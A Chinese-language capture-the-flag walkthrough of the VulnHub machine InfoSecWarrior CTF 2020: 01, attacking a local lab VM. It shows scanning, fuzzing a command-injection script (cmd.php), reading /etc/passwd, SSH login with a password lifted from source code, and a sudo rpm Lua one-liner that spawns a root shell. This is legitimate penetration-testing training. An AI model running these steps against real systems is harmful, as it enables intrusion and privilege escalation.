Infosec Warrior
作者: jason huawen
靶机信息
名称:InfoSecWarrior CTF 2020: 01
地址:- https://www.vulnhub.com/entry/infosecwarrior-ctf-2020-01,446/
复制代码 识别目标主机IP地址
- ─(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
- Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
- 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
- 192.168.56.100 08:00:27:9f:b1:40 1 60 PCS Systemtechnik GmbH
- 192.168.56.253 08:00:27:e6:d8:5f 1 60 PCS Systemtechnik GmbH
复制代码 利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.253
NMAP扫描
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scan
- Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-17 00:37 EDT
- Nmap scan report for bogon (192.168.56.253)
- Host is up (0.00040s latency).
- Not shown: 65351 filtered tcp ports (no-response), 182 filtered tcp ports (host-prohibited)
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-hostkey:
- | 1024 2fb3a5cde51433a1823bdd5a5ed75936 (DSA)
- |_ 2048 2db4152836d8b54e18818eaf3ee4dec1 (RSA)
- 80/tcp open http Apache httpd 2.2.15 ((CentOS))
- |_http-title: Apache HTTP Server Test Page powered by CentOS
- |_http-server-header: Apache/2.2.15 (CentOS)
- | http-methods:
- |_ Potentially risky methods: TRACE
- MAC Address: 08:00:27:E6:D8:5F (Oracle VirtualBox virtual NIC)
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 186.97 seconds
复制代码 NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(HTTP)
获得Shell
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ curl http://192.168.56.253/robots.txt
- <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
- <html><head>
- <title>404 Not Found</title>
- </head><body>
- <h1>Not Found</h1>
- <p>The requested URL /robots.txt was not found on this server.</p>
- <hr>
- <address>Apache/2.2.15 (CentOS) Server at 192.168.56.253 Port 80</address>
- </body></html>
- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ nikto -h http://192.168.56.253
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.168.56.253
- + Target Hostname: 192.168.56.253
- + Target Port: 80
- + Start Time: 2023-04-17 00:42:27 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Apache/2.2.15 (CentOS)
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
- + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
- + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
- + Server may leak inodes via ETags, header found with file /sitemap.xml, inode: 264859, size: 292, mtime: Thu Feb 13 06:51:21 2020
- + OSVDB-3092: /sitemap.xml: This gives a nice listing of the site content.
- + OSVDB-3268: /icons/: Directory indexing found.
- + OSVDB-3233: /icons/README: Apache default file found.
- + 8724 requests: 0 error(s) and 10 item(s) reported on remote host
- + End Time: 2023-04-17 00:42:45 (GMT-4) (18 seconds)
- --------------------------------------------------------------------------
复制代码 接下里看能否扫码出目录或者文件?- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ curl http://192.168.56.253/note.txt
- Note Form Developer Team
- 1. Try Harder
- 2. Enumeration is the key
- Ping Us on @armourinfosec @MAALP1225 @CyberKnight00
复制代码 cmd.php文件被重定向到外网的网站。- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ curl http://192.168.56.253/wordpress/
- <!DOCTYPE html>
- <html xmlns="http://www.w3.org/1999/xhtml">
- <head>
- <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
- <title>Database Error</title>
- </head>
- <body>
- <h1>Error establishing a database connection</h1>
- </body>
- </html>
复制代码 但是cmd.php看上去就是有命令执行,因此FUZZ一下- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ wfuzz -c -u 'http://192.168.56.253/cmd.php?FUZZ=id' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
- /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
- ********************************************************
- * Wfuzz 3.1.0 - The Web Fuzzer *
- ********************************************************
- Target: http://192.168.56.253/cmd.php?FUZZ=id
- Total requests: 220560
- =====================================================================
- ID Response Lines Word Chars Payload
- =====================================================================
- 000007399: 200 0 L 10 W 58 Ch "AI"
复制代码 FUZZ出参数名称为AI ,访问却返回:- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ curl http://192.168.56.253/cmd.php?AI=id
- Now the main part what it is loooooool<br>Try other method
复制代码 是不是需要利用burpsuite拦截请求,将方法修改为POST
<img alt="" loading="lazy">
结果返回了:- ou Found ME : - (
- uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0
复制代码 那接下来就看获得Shell了
测试了一下,不存在nc命令
可以读取到/etc/passw文件:- root:x:0:0:root:/root:/bin/bash
- bin:x:1:1:bin:/bin:/sbin/nologin
- daemon:x:2:2:daemon:/sbin:/sbin/nologin
- adm:x:3:4:adm:/var/adm:/sbin/nologin
- lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
- sync:x:5:0:sync:/sbin:/bin/sync
- shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
- halt:x:7:0:halt:/sbin:/sbin/halt
- mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
- uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
- operator:x:11:0:operator:/root:/sbin/nologin
- games:x:12:100:games:/usr/games:/sbin/nologin
- gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
- ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
- nobody:x:99:99:Nobody:/:/sbin/nologin
- vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
- saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
- postfix:x:89:89::/var/spool/postfix:/sbin/nologin
- sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
- apache:x:48:48:Apache:/var/www:/sbin/nologin
- isw0:x:500:500::/home/isw0:/bin/bash
- isw1:x:501:501::/home/isw1:/home/isw1/bash
- isw2:x:502:502::/home/isw2:/bin/bash
- dbus:x:81:81:System message bus:/:/sbin/nologin
- avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
复制代码 通过构造命令ls -alh /var/www/html,可以得到- total 424K
- drwxr-xr-x. 3 root root 4.0K Feb 17 2020 .
- drwxr-xr-x. 6 root root 4.0K Feb 12 2020 ..
- -rw-r--r--. 1 root root 440 Feb 17 2020 cmd.php
- -rw-r--r--. 1 root root 303K Feb 13 2020 hacker.gif
- -rw-r--r--. 1 root root 366 Feb 13 2020 index.htnl
- -rw-r--r--. 1 root root 92K Feb 13 2020 minnions.gif
- -rw-r--r--. 1 root root 120 Feb 17 2020 note.txt
- -rw-r--r--. 1 root root 292 Feb 13 2020 sitemap.xml
- drwxr-xr-x. 5 apache apache 4.0K Feb 13 2020 wordpress
复制代码 通过构造命令: cat cmd.php,可以得到文件内容:- ";
- echo "Try other method";
- die;
- }
- if(isset($_POST['AI'])){
- echo "You Found ME : - (";
- echo "
- ";
- $cmd = ($_POST['AI']);
- system($cmd);
- echo "
- ";
- die;
- }
- else {
- header("Location: https://www.armourinfosec.com/category/information-gathering/");
- }
- $user="isw0";
- $pass="123456789blabla";
- ?>
复制代码 这里包含了用户名和口令,其实花了各种反弹shell的命令都没能成功,对信息的收集很重要- ┌──(kali㉿kali)-[~/Vulnhub/Infosec]
- └─$ ssh isw0@192.168.56.253 -oHostKeyAlgorithms=+ssh-dss
- The authenticity of host '192.168.56.253 (192.168.56.253)' can't be established.
- DSA key fingerprint is SHA256:k7Z+v1xXZDVvuiUjQxQJ89yKvN0yffDJnR5yQvPnoS8.
- This host key is known by the following other names/addresses:
- ~/.ssh/known_hosts:53: [hashed name]
- Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
- Warning: Permanently added '192.168.56.253' (DSA) to the list of known hosts.
- isw0@192.168.56.253's password:
- Last login: Mon Feb 17 13:56:07 2020 from 192.168.56.1
- [isw0@InfosecWarrior ~]$ id
- uid=500(isw0) gid=500(isw0) groups=500(isw0) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
- [isw0@InfosecWarrior ~]$
复制代码- [isw0@InfosecWarrior ~]$ cat isw0_user
- e4408105ca9c2a5c2714a818c475d06e
复制代码 提权
- isw0@InfosecWarrior wordpress]$ sudo /bin/rpm --eval '%{lua:os.execute("/bin/sh")}'
- [sudo] password for isw0:
- sh-4.1# cd /root
- sh-4.1# ls -alh
- total 56K
- dr-xr-x---. 2 root root 4.0K Feb 14 2020 .
- dr-xr-xr-x. 21 root root 4.0K Apr 17 10:05 ..
- -rw-------. 1 root root 1.1K Feb 12 2020 anaconda-ks.cfg
- -rwx------. 1 root root 65 Feb 14 2020 Armour.sh
- lrwxrwxrwx. 1 root root 9 Feb 12 2020 .bash_history -> /dev/null
- -rw-r--r--. 1 root root 18 May 20 2009 .bash_logout
- -rw-r--r--. 1 root root 176 May 20 2009 .bash_profile
- -rw-r--r--. 1 root root 176 Sep 23 2004 .bashrc
- -rw-r--r--. 1 root root 100 Sep 23 2004 .cshrc
- ----------. 1 root root 33 Feb 13 2020 flag.txt
- -rw-r--r--. 1 root root 8.3K Feb 12 2020 install.log
- -rw-r--r--. 1 root root 3.4K Feb 12 2020 install.log.syslog
- -rw-r--r--. 1 root root 129 Dec 4 2004 .tcshrc
- sh-4.1# cat flag.txt
- fc9c6eb6265921315e7c70aebd22af7e
- sh-4.1#
复制代码 至此提权成功。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |